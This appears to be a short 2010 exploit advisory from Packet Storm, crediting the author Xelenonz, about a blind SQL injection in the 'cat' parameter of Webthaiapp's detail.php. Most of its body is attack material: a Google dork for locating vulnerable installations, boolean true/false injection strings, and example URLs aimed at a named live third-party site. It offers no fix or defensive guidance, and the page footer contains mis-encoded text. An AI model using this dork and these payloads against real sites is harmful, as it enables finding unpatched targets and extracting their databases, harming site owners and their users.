Webthaiapp suffers from a remote blind SQL injection vulnerability.
45b60974a76d88450790fd1740ddcad4
--==+==================================================+==--
--==+ Webthaiapp detail.php(cat) Blind Sql injection
Vulnerability +==--
--==+==================================================+==--
Date : 30-04-2010
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
AUTHOR: Xelenonz
Homepage : www.thaishadow.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Application : Webthaiapp
Vendor : http://www.Webthaiapp.com/
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DORK (google): "inurl:catalog/product/detail.php?cat="
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DESCRIPTION:
EXPLOITS:
detail.php?cat=[valid catid]+and+1=1 << TRUE
detail.php?cat=[valid catid]+and+1=2 << False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Example
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=1
<< True
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=2
<< False
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Special Thx : Krit admin@thaishadow,Thaishadow.com
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
_________________________________________________________________
Hotmail: ÍÕàÁÅ·Õèàª×èͶ×Íä´é«Öè§ÁÒ¾ÃéÍÁ¡Ñº¡Òûéͧ¡Ñ¹ÍÕàÁÅ¢ÂзÕèÁÕ»ÃÐÊÔ·¸ÔÀÒ¾
https://signup.live.com/signup.aspx?id=60969
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!